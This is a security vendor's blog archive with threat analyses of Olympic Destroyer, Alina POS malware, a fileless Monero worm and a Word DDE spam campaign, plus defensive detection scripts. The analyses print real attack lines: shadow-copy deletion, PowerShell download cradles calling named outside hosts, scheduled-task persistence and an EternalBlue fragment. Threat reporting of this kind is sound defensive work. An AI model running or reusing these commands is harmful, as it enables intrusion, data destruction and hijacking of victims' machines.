Tag Archives: PandaLabs

Cryptocurrency. A tool for criminals?

Cryptocurrencies had an exceptional year in 2017. Both the technology and the value of virtual currencies have experienced historic breakthroughs. At the same time, the rise of these digital currencies is causing serious concerns in the world of cybersecurity. Are cryptocurrencies mainly a tool for criminals?

What are cryptocurrencies?

Cryptocurrencies first appeared due to the need to make anonymous transactions. While the idea of a decentralized digital currency first came about in 1998, it wasn’t until 2009 that the first cryptocurrency was created: Bitcoin. Currently, more than 1,300 cryptocurrencies exist. Each one has a different origin and characteristics, but all are alike in that they are digital and attempt to ensure anonymity in transactions.

Cryptocurrencies guarantee a complete, balanced and secure way to make transactions. That’s why they are used as a currency for the exchange of goods and services. They can also be exchanged for money, including other cryptocurrencies. Some digital currencies are only used to buy certain types of goods or other cryptocurrencies, while the best-known cryptocurrencies, such as Bitcoin, Ethereum and Litecoin, can be used like regular money.

One of the most common concerns surrounding cryptocurrencies is the fact that they have to be mined. Many digital currencies are obtained through performing mathematical computations, and much like powering any other computer, cryptocurrencies are obtained through the energy expenditure these operations produce. The legality of cryptocurrencies is currently a hot topic. There are countries considering prohibiting the use of the digital assets, while in others they are stuck in a sort of legal limbo.

Blockchain and digital security

Naturally there are genuine concerns regarding the safety of cryptocurrencies. After all, one wonders if their digital foundation could be exploited by cybercriminals, or if there is a possibility of cryptocurrencies being hacked and created from scratch. As we explained earlier, the reality is cryptocurrencies are generally very safe. Although cracking the existing security of a cryptocurrency is mathematically possible, the cost of doing so is prohibitively high.

It would require more computing power than any large technology company could possibly have. This is mostly due to the fact that cryptocurrencies use blockchain technology. A blockchain consists of a distributed database, and by design, blockchains are completely tamper-proof. To that effect, cryptocurrencies use trusted timestamping, which proves the exact time that data existed along the chain. Any altering or tampering of the timestamp would break the integrity of the digital currency and devalue it to zero.

Blockchain technology is extremely useful in cryptocurrency mining. So much so that without this technology, digital currencies would not exist or would be very different. Blockchain technology is the cornerstone of cryptocurrencies’ impenetrable defense as well as of their anonymity.

A tool for cybercriminals?

Cryptocurrencies’ solid defense is however a double-edged sword. The anonymity of cryptocurrencies is one of the most appealing aspects for cybercriminals. After all, a digital currency that assures transparency and a simple transaction would appear to be an ideal method of payment for outlaw hackers.

Currently practically all ransomware attacks ask for payment through Bitcoin or other cryptocurrencies. However, this is not the only appeal for cybercriminals. The “PandaLabs Annual Report 2017” states that cryptocurrency mining infections are set to increase in frequency.

One of the newest attacks consists of infecting browsers so that users’ computers behave like cryptocurrency miners. This sort of attack will probably only become more common. While the theft or loss of a user’s cryptocurrency wallet is much more difficult, it is still possible. One example is the recent freeze of hundreds of millions of dollars’ worth of Ether, Ethereum’s digital currency.

Despite the unfortunate fact that the use of cryptocurrencies will probably always be linked to cybercrime, this is a mere unintended result. Cryptocurrencies continue to be of great use, despite their extreme volatility. There are increasingly more businesses and countries using digital currencies to exchange services or influence the economy in a secure way. That said, security can sometimes manifest itself in strange ways and have the opposite effect of its original intent, which can lead to catastrophic consequences for a company if it is not well prepared.

The post Cryptocurrency. A tool for criminals? appeared first on Panda Security Mediacenter.


Cyber Sabotage at the Winter Olympics

On Monday, while spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, held in Pyeongchang, the Olympics organizing committee was busy dealing with a cyberattack.

The decline in new malware samples and the professionalization of attacks on networks are setting new standards in cybersecurity. In this case, we’re dealing with a targeted attack and an act of sabotage, in which hackers sought to cause chaos during the opening ceremony. It affected some television and internet services before the ceremony, but was not successful in stealing data from servers.

Researchers from Cisco’s Talos division also added that the malware’s purpose was not theft, but rather destruction.

GoldDragon, the latest Russian hack?

With the focus usually centered on maximum profit, there’s been an increase in the number of advanced infiltrations using sharp new tactics, such as malwareless attacks and the abuse of non-malicious tools.

PandaLabs explains that by not using malware, which is easily detected by advanced cybersecurity tools, attackers assume the identity of the administrator after having obtained their network credentials. They warn that the techniques used by cybercriminals to attack without using malware can be highly varied, taking advantage of all kinds of non-malicious tools that are part of the day-to-day of IT managers.

In this case, the attack did in fact use malware (named GoldDragon), but to carry out certain actions it used non-malicious tools such as PsExec or the CMD itself. In this way, it was able to execute processes on other computers connected to the network without raising suspicion and without using a version modified by the attackers, but rather the official version.

To carry out its destructive actions, it launched system commands from a command window (cmd). Instructions looked like this:

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Here, vssadmin.exe is used to silently erase the backup copies (volume shadow copies) created by the operating system.

Everything seems to indicate that the attack came from Russia. Ukrainian intelligence and a CIA report linked NotPetya and BadRabbit to Russian intelligence, and in the case of GoldDragon (also called Olympic Destroyer), all signs point to a more refined version of BadRabbit.

System tools as a new attack vector

Monitoring the execution of all processes on company workstations and servers is essential to avoiding close calls like the one we witnessed at this year’s Winter Olympics.

Traditional antiviruses are not able to detect these types of attack, nor to remediate them. Panda Adaptive Defense, however, proposes a new security model based on monitoring, controlling and classifying the behavior and nature of every application in execution, to offer robust and complete protection.

PandaLabs recommends the use of advanced cybersecurity solutions such as Panda Adaptive Defense, which also allow the client’s existing infrastructure to coexist with traditional antivirus systems and integrate with existing SIEM solutions.

The post Cyber Sabotage at the Winter Olympics appeared first on Panda Security Mediacenter.


PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018

Today, more malware samples are created in just a few hours than in the entire twentieth century. The targets have changed, the techniques have become more sophisticated, the attack vectors have multiplied, and the tools are more precisely designed. Attackers are meticulously studying their victims to adapt their strategy and achieve the greatest possible impact.

Their efficiency, effectiveness, and profitability are proven time and again, with up to 75 million distinct malware files created between the beginning of the year and October, which translates to 285,000 new samples detected every day by PandaLabs.

2017 Cybersecurity Trends

More than half of attacks are motivated by financial targets, while espionage is the second greatest motivating factor.

Stealth attacks with adaptive lateral movements are becoming all too common.

Malwareless attacks are increasingly favored by attackers. They prefer to remain invisible to traditional protection models, and do not require the victim’s interaction. These attacks can double profitability when optimally executed.

Tools for exploiting vulnerabilities have given rise to new attack vectors that require no human interaction.

The endpoint is the target. The perimeter has become blurred, mobility is the norm in any company, and corporate networks are therefore much more exposed.

Ex-employees attempted to extort their previous companies, initiating attacks from within the company.

There was a larger presence of organized cybercriminal groups, such as the Lazarus Group, attacking the media, the aerospace and financial sectors, as well as critical infrastructures in the US and elsewhere.

Cyberwarfare and cyber-armies: in a full on arms race in cyberspace, nations are creating cyber command centers to bolster defenses against attacks on companies and infrastructures.


In 2017, PandaLabs analyzed and neutralized a total of 75 million malware files, about 285,000 new samples a day.

One thing is clear: there are many more malware samples, and each of them is infecting fewer devices individually. Each malware sample will attack a minimum number of devices in order to lower the risk of being detected and thereby achieve its goal.

This is supported by the fact that, of all the new malware (PE files) never seen before this year (15,107,232 samples), 99.10% were seen only once, that is, 14,972,010 samples. Looking at the figures from the other end, only an insignificant part of all malware is truly widespread: we have seen just 989 malware files on more than 1,000 computers, 0.01% of the total.

This confirms what we already knew: with a few exceptions — such as WannaCry or HackCCleaner — most malware changes every time it infects, so each copy has a very limited distribution.

Cybersecurity Predictions for 2018

Cyberwarfare and its consequences: Instead of an open war where the opposing sides are clearly identifiable, we are facing a guerrilla strategy with isolated attacks whose authors are never clear. Freelancers at the service of the highest bidder, false flag operations, and an increase in collateral victims of these attacks is what’s in store for 2018.

Malwareless hacking attacks: attacks that abuse non-malicious tools or compromised applications to carry out their efforts will increase.

Malware for mobile devices and the Internet of Things will continue to rise. In general, IoT devices are not targeted by cybercriminals as the ultimate goal. But when compromised, these devices increase the attack surface and are used as a gateway to the company’s network.

More advanced attacks and more ransomware can be expected in the coming year. These attacks promise a high return on their investment at a low level of risk.

Companies will spearhead awareness-building initiatives for attacks: for the first time in history, the public will be aware of attacks that happen and are in many cases subsequently covered up, thanks to the new GDPR legislation.

Social networks and propaganda: there will be an increase in fake news due to the ability of these platforms to influence public opinion. Facebook, the largest social network in the world, is already taking action on the matter. If it is discovered that a Facebook page repeatedly distributes false news, it will prohibit it from being publicized on the social network.

Cryptocurrency: the use of cryptocurrencies will continue to grow, and all the cybercrime that surrounds it, such as infecting computers with cryptocurrency mining software or the theft of user wallets, will follow suit.


Security update protocols should be a priority at all companies. Cases such as WannaCry or Equifax reaffirm this, as every day that passes without patching a vulnerable system puts the company at risk, as well as the integrity of its data, including that of customers and suppliers. Production can be endangered and incur millions in losses.

Countries are investing more and more in defensive and offensive capabilities, with a focus on critical infrastructures.

2018 augurs a more dangerous situation. For many professionals, a change of mentality (and strategy) will be necessary to achieve the highest levels of security and protect the assets of their companies’ networks.

Both in business and at home, training and awareness are key. It follows that cybersecurity, often forgotten by management, will require a greater investment.

Having in-depth knowledge of attacks and what they consist of should be the basis for a good defensive strategy. Machine Learning tools and the investigations of Threat Hunting teams are essential to avoid future intrusions.

Signature files no longer work and the figures speak for themselves: more than 99% of all malware never appears again anywhere else.

There is a problem of focus: solutions that remain focused on fighting against malware (the majority of those available on the market) are doomed to become extinct if they do not change their strategy.

And of course, we can’t forget international cooperation and the creation of common legislative frameworks such as the GDPR. Having political and economic support and a plan of action will make it possible to benefit from the latest technological advances in the safest manner.

In the PandaLabs Annual Report, you can learn about real cases, review the most discussed attacks of 2017, and read more about what lies ahead in 2018.

The post PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018 appeared first on Panda Security Mediacenter.


Alina, the Latest POS Malware

The danger of having the data of thousands of credit cards recorded makes Point of Sale (POS) terminals a critical system, as well as an increasingly sought-after target of cybercrime. Attacking these devices anonymously online is relatively straightforward, and selling the data on the black market is profitable.

We’ve recently detected infections at a significant number of bars and restaurants in the United States whose POS terminals were attacked by two variants of credit card theft malware.

The malware samples that we’ll be analyzing are the following:

File name      MD5
Epson.exe      69E361AC1C3F7BCCE844DE43310E5259
Wnhelp.exe     D4A646841663AAC2C35AAB69BEB9CFB3

Epson.exe presents an invalid certificate:

Both samples were compiled with Microsoft Visual C++ 8 and are neither packed nor encrypted. Once the malware is executed on the system, it proceeds to inspect the different system processes in search of credit card data.

Here we can see how they go through the different processes looking only for those that can contain credit cards in memory:

In the case of the “Epson.exe” sample, it will search for credit cards in the following processes:

Program name                                                          Description
notepad++.exe                                                         Text editor
CreditCardService.exe                                                 Microsoft
DSICardnetIP_Term.exe                                                 NETePay for Mercury
DSIMercuryIP_Dial.exe                                                 NETePay for Mercury
EdcSvr.exe                                                            Aloha Electronic Draft Capture (EDC)
fpos.exe                                                              Future POS
mxSlipStream4 / mxSlipStream5 / mxSlipStream.exe / mxSwipeSVC.exe     SlipStream POS System Transaction Processor by mXpress
NisSrv.exe                                                            Windows 8
spcwin.exe / Spcwin.exe / SPCWIN.exe / SPCWIN.EXE                     POSitouch (Food Service Industry POS System)

On the other hand, the “Wnhelp.exe” sample contains a list that is used to discard the processes to be analyzed. If the process name coincides with any item on the list, it will not be analyzed in the search for credit cards:

Discarded processes:

  • explorer.exe
  • chrome.exe
  • firefox.exe
  • iexplore.exe
  • svchost.exe
  • smss.exe
  • csrss.exe
  • wininit.exe
  • steam.exe
  • devenv.exe
  • thunderbird.exe
  • skype.exe
  • pidgin.exe
  • services.exe
  • winlogon.exe
  • alg.exe
  • wscntfy.exe
  • taskmgr.exe
  • spoolsv.exe
  • QML.exe
  • AKW.exe
  • OneDrive.exe
  • VsHub.exe
  • Microsoft.VsHub.Server.HttpHost.exe
  • vcpkgsrv.exe
  • dwm.exe
  • dllhost.exe
  • jusched.exe
  • jucheck.exe
  • lsass.exe


In both samples, once a process to analyze has been selected, either because it appears on the target list (as with Epson.exe) or because it is absent from the exclusion list (as with Wnhelp.exe), the malware creates a new thread:

And will then proceed to analyze the memory using an algorithm specifically designed to check whether the found data is from credit cards:

The Wnhelp.exe sample is executed by the attackers with the command “install”, in such a way that it creates a service to ensure its persistence in the system:

The service is called “Windows Error Reporting Service Log”.

The sample Epson.exe works in the same way, although attackers can configure the name of the service as they want through parameters:

install [Service name] [Service description] [Third parameter]

Each variant connects to a different command and control (C&C) server:

Epson.exe      dropalien.com/wp-admin/gate1.php
Wnhelp.exe     www.rdvaer.com/wp-admin/gate1.php


They can then receive different orders from the attacker:

Command                 Description
update = [URL]          Malware update.
dlex = [URL]            Downloads and runs a file.
chk = [CRC_Checksum]    Updates the file’s checksum.

To connect to the control panel, they use the following User-Agent:

“Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22”

The communication is carried out over SSL. The malware modifies the Internet connection configuration to ignore unknown CAs (Certificate Authorities), thereby ensuring that it can use its own certificate.

First it obtains the internet connection security flags through the InternetQueryOptionA API with the third argument set to the value INTERNET_OPTION_SECURITY_FLAGS (31). Once obtained, it carries out a binary OR with the flag SECURITY_FLAG_IGNORE_UNKNOWN_CA (100h).
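As an added illustration (not part of the original analysis and not code from any Panda product), the following Python script shows how an analyst can spot this change in a sandbox API trace: it pairs each InternetSetOptionA call on INTERNET_OPTION_SECURITY_FLAGS with the preceding InternetQueryOptionA on the same handle and names the certificate checks that the newly added IGNORE_* bits switch off. The trace line format and the handle values are constructed for the example; the option number (31) and the flag values are the documented WinINet constants. The post does not say which API writes the flags back, so the example assumes InternetSetOptionA.

```python
import re

# WinINet constants from the Windows SDK (wininet.h).
INTERNET_OPTION_SECURITY_FLAGS = 31
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}

# Constructed trace line format for this example (real sandbox loggers each have their own):
#   InternetQueryOptionA(handle=0x..., option=31, value=0x...)   value = DWORD read back
#   InternetSetOptionA(handle=0x..., option=31, value=0x...)     value = DWORD written
TRACE_RE = re.compile(
    r"(InternetQueryOptionA|InternetSetOptionA)\(handle=(0x[0-9a-fA-F]+), "
    r"option=(\d+), value=(0x[0-9a-fA-F]+)\)")


def disabled_checks(flags):
    """Names of the certificate checks switched off by the IGNORE_* bits set in flags."""
    return [name for bit, name in sorted(SECURITY_FLAGS.items()) if flags & bit]


def audit_trace(lines):
    """Pair each InternetSetOptionA(INTERNET_OPTION_SECURITY_FLAGS) with the preceding
    InternetQueryOptionA on the same handle and report the IGNORE_* bits the process added.
    Returns {handle: [check names]} for every handle whose validation was weakened."""
    queried = {}
    alerts = {}
    for line in lines:
        m = TRACE_RE.search(line)
        if not m:
            continue
        api, handle = m.group(1), m.group(2)
        option, value = int(m.group(3)), int(m.group(4), 16)
        if option != INTERNET_OPTION_SECURITY_FLAGS:
            continue
        if api == "InternetQueryOptionA":
            queried[handle] = value
        else:
            added = value & ~queried.get(handle, 0)   # bits present after, absent before
            names = disabled_checks(added)
            if names:
                alerts[handle] = names
    return alerts


# Constructed trace: handle 0xcc0004 mirrors the behaviour described in the text
# (query the flags, OR in 100h, write them back); handle 0xcc0008 leaves the flags alone.
SAMPLE_TRACE = [
    "InternetOpenA(agent=\"Mozilla/5.0 (Windows NT 6.2; WOW64) ...\") -> 0xcc0000",
    "InternetQueryOptionA(handle=0xcc0004, option=31, value=0x0)",
    "InternetSetOptionA(handle=0xcc0004, option=31, value=0x100)",
    "InternetQueryOptionA(handle=0xcc0008, option=31, value=0x0)",
    "InternetSetOptionA(handle=0xcc0008, option=31, value=0x0)",
    "InternetSetOptionA(handle=0xcc0008, option=2, value=0x7530)",   # a timeout option, ignored
]

if __name__ == "__main__":
    for handle, names in audit_trace(SAMPLE_TRACE).items():
        print(handle, "disabled:", ", ".join(names))
```

Comparing the written value against the value read back on the same handle, rather than flagging any non-zero value, keeps legitimate software that merely preserves existing flags out of the report.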

Conclusion: How to Confront a POS Attack

Attacks on POS terminals are still very popular, especially in countries like the United States where the use of Chip & PIN is not mandatory. Many of these attacks target businesses that do not have specialized personnel in computer science, much less in security, an oversight that attackers can take advantage of.

POS terminals are computers that handle critical data and therefore must be fortified to the maximum in order to shield customer data from the inherent risks. Solutions such as Adaptive Defense 360 help to ensure that no malicious process is executed on these terminals. There is no need to hire a security specialist, because the solution includes Panda Security’s own technicians, who will be responsible for ensuring that all executed processes are safe.

The post Alina, the Latest POS Malware appeared first on Panda Security Mediacenter.


Threat Hunting, the Investigation of Fileless Malware Attacks

Fileless Monero WannaMine, a new attack discovered by PandaLabs


Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f "tokens=2 delims=.[" %i in ('ver') do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&@echo ox.open "GET","http://stafftest.firewall-gateway.com:8000/info.vbs",false>>%windir%\11.vbs&@echo ox.setRequestHeader "User-Agent", "-">>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&@echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://stafftest.firewall-gateway.com:8000/info6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://stafftest.firewall-gateway.com:8000/info3.ps1')}")

Analysis of Network Propagation

Soon after we began our investigation at PandaLabs, we observed the attackers, aware that they had been discovered, shutting down their command and control servers; before they went offline, however, we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a    ps1    ~4MB
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7    vbs    ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (a DLL) reflectively, leaving the disk untouched, so that it can steal credentials. These credentials are used later to move laterally across internal (unprotected) networks.

The script implements, in Powershell, the famous NetBios exploit, known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the base64 of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR "%temp%\y1.bat" &&SCHTASKS /run /TN yastcat

As you can see, it programs a daily scheduled task (“yastcat”) that runs the “y1.bat” file, which in turn downloads and executes “mate6.ps1” unless the WMI event subscription is already in place.

Note that we do not have this file at our disposition, as the command and control servers are currently offline.
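The command lines quoted in this post (the cmd launcher that picks VBScript or PowerShell depending on the Windows version, the base64-encoded PowerShell run through wmiprvse.exe, and the schtasks persistence command), together with the vssadmin shadow-copy deletion quoted in the Olympic Destroyer post above, are all process-creation events that can be triaged from the command line alone. The following Python script is an added example written for this page; it is not PandaLabs code and not Adaptive Defense logic. It decodes -E/-EncodedCommand payloads (PowerShell expects base64 over UTF-16LE text), extracts URLs, and tags download cradles, hidden-window switches, scheduled-task persistence and shadow-copy deletion. The pattern lists and the c2.example.invalid host in the constructed samples are assumptions made for the example.

```python
import base64
import re

# Indicator patterns assumed for this example (not a vendor's rule set).
CRADLE_PATTERNS = [
    r"DownloadString\(", r"DownloadFile\(", r"MSXML2\.XMLHTTP",
    r"ADODB\.Stream", r"\bIEX\b", r"Invoke-Expression",
]
PERSISTENCE_PATTERNS = [
    r"SCHTASKS\s+/create", r"__FilterToConsumerBinding", r"\bsc(\.exe)?\s+create\b",
]
DESTRUCTIVE_PATTERNS = [r"vssadmin(\.exe)?\s+delete\s+shadows", r"wbadmin(\.exe)?\s+delete"]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# -E / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts switch prefixes).
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_powershell(script):
    """Build an -EncodedCommand argument the way PowerShell expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -E/-EncodedCommand, or None when there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Tag one process command line. The decoded PowerShell is scanned as well, so a
    cradle hidden behind -E is still found. Returns findings, URLs and the decoded script."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    findings = set()
    for tag, patterns in (("download_cradle", CRADLE_PATTERNS),
                          ("persistence", PERSISTENCE_PATTERNS),
                          ("shadow_copy_deletion", DESTRUCTIVE_PATTERNS)):
        if any(re.search(p, text, re.IGNORECASE) for p in patterns):
            findings.add(tag)
    if re.search(r"-w(?:indowstyle)?\s+hidden", text, re.IGNORECASE):
        findings.add("hidden_window")
    if decoded is not None:
        findings.add("encoded_command")
    return {"findings": sorted(findings),
            "urls": sorted(set(URL_RE.findall(text))),
            "decoded": decoded}


# Constructed samples modelled on the command lines in the text; c2.example.invalid is a placeholder host.
SAMPLE_VSSADMIN = r"C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet"
SAMPLE_CRADLE = ("powershell -NoP -NonI -W Hidden \"IEX(New-Object Net.WebClient)"
                 ".DownloadString('http://c2.example.invalid:8000/info6.ps1')\"")
SAMPLE_ENCODED = "powershell.exe -NoP -NonI -W Hidden -E " + encode_powershell(
    "IEX(New-Object Net.WebClient).DownloadString('http://c2.example.invalid:8000/mate6.ps1')")
SAMPLE_SCHTASKS = ("SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR \"%temp%\\y1.bat\" "
                   "&& SCHTASKS /run /TN yastcat")

if __name__ == "__main__":
    for sample in (SAMPLE_VSSADMIN, SAMPLE_CRADLE, SAMPLE_ENCODED, SAMPLE_SCHTASKS):
        result = triage(sample)
        print(result["findings"], result["urls"])
```

Scanning the decoded text together with the raw command line is the important design choice: the wmiprvse.exe command in the post carries nothing recognisable before decoding, and an encoded command on its own is only a weak signal.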

Infection Vector 

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Note that on October 27, 2017, these servers ceased to be operative.




Indicators of compromise:

  • exe (Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196)
  • %windir%\11.vbs
  • %windir%\info.vbs
  • %windir%\info6.ps1
  • dll
  • dll
  • Scheduled task “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95


Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when the goal is merely to install Monero miners (leaving aside data theft, sabotage or espionage), attackers are using advanced techniques and sharp tactics. Because the attack is fileless, most traditional antivirus solutions can barely counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen, at one point both the scripts and the Monero client are downloaded).

Such signatures only cover this particular attack; anything that varies even slightly will slip past them, and in any case only the final stage of the attack is detected, with no visibility into how it moves through the network and compromises computers.

Because Adaptive Defense classifies every running process on every computer, we are able to monitor the entire network in real time, something that is becoming increasingly necessary as attackers turn to malwareless techniques that abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (opening of connections, file downloads, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.

The post Threat Hunting, the Investigation of Fileless Malware Attacks appeared first on Panda Security Mediacenter.


A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.


The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('hxxp://arkberg-design.fi/KJHDhbje71');powershell -e $e "


Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which sample is analyzed, we can see that the download URL changes, while the command is essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e
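Because the field code is the whole payload here (no macro, no OLE object), a document scanner only needs to read the field instructions. The following Python script is an added example, not code from the original post or from Panda Security: it extracts field instructions from a .docx (the w:instrText runs of each paragraph, which Word often splits across several runs, plus w:fldSimple attributes) and does a best-effort string scan of a binary .doc, then reports the command behind every DDE or DDEAUTO field. The sample documents are constructed in memory, and downloader.example.invalid is a placeholder host.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# A field instruction starting with DDE or DDEAUTO asks Word to talk to a DDE server, i.e. run a program.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b\s+(.+)", re.IGNORECASE | re.DOTALL)


def field_instructions_docx(data):
    """Field instructions of a .docx: <w:instrText> runs joined per paragraph (Word splits
    one instruction across several runs) plus the w:instr attribute of <w:fldSimple>."""
    instructions = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    for para in root.iter(W_NS + "p"):
        parts = [t.text or "" for t in para.iter(W_NS + "instrText")]
        if parts:
            instructions.append("".join(parts))
    for fld in root.iter(W_NS + "fldSimple"):
        instructions.append(fld.get(W_NS + "instr", ""))
    return instructions


def field_instructions_raw(data):
    """Best-effort scan of a binary .doc: field text sits between the control characters
    0x13 (field begin) and 0x14 (separator), stored either as 8-bit or UTF-16LE text."""
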